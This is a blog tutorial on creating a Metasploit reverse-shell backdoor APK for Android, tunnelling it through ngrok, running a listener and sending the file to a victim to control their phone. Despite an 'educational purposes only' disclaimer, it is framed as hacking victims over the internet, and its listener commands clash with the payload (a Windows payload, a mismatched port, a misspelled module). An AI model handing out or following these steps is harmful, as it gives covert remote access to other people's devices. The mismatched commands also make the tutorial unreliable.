In this post, you are going to read about how to create backdoor in Android with Metasploit to hack any android device and control it using our system. This is the second blog on hacking android systems with Metasploit but this time will show you how to do it by making the link with ngrok to hack victims over the internet…

Disclaimer – This blog is for educational purposes only How to create backdoor in Android, If you do anything illegal then we are not responsible for it…

What Is Metasploit?

how to create backdoor in android

The Metasploit Framework is an open-source powerful tool that is used by CyberCriminals as well as Ethical-Hackers to find systematic vulnerabilities on networks and servers because it can be easily customized and used in most Linux operating systems.

Metasploit came preinstalled in all Linux operating systems like Kali Linux, Parrot OS, etc. But if you don’t have it then you can install it by typing ( sudo apt-get install metasploit-framework )…

How to create backdoor in Android using Payload with Metasploit?

So 1st we have to create our ngrok server to use the apk format virus file anywhere. For doing that open the file path of ngrok in the terminal and type this command ( ./ngrok tcp 1337 )…

Note – Read and type all commands very carefully because if you type a single wrong command then the Metasploit will not work…

Open another terminal for create backdoor in android and write this payload

command :- msfvenom -p android/meterpreter/reverse_tcp lhost=(YOUR NGROK LINK) lport=(YOUR NGROK PORT) -o filename ). See the photo for a better understanding…

Remember – You have to copy ngrok link from after double slash ( // ) till ( .io ) to paste it in lhost.

After that, you can see a ZIP file in your home directory which is also your virus. Now we have to create our listener which will help us to control our victim’s system…

Follow the commands below to create the Listener: –

  • msfconsole
  • use expliot/multi/handler
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost 0.0.0.0
  • set lport 4242
  • exploit

Now everything is done, just send your virus file to your target and if he/she will open it then we will get remote access to their Android…

First, type ( background ) command after gaining the access to the system. It will help us to stay connected to our victim’s device even if you start the Metasploit session again after closing it…

If you want to connect again with the victim so type ( sessions ) for viewing how many connections you have then type ( sessions -i <Victim session no.> ) for connecting again…

Now you can do whatever you want with the victim’s device but without harming them. If you want a video on Full Metasploit Tutorial so you can comment us down…

If you want to learn more about Metasploit so you can check our other blogs on it – https://reconcybersecurity.com/blog/category/metasploit/

Tips – You can type the ( help ) command in Metasploit for viewing all commands after hacking the victim’s windows…

If you have any problem with our blog so you can comment to us we will try to fix it.

– Recon

0 Shares:
1 comment
Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like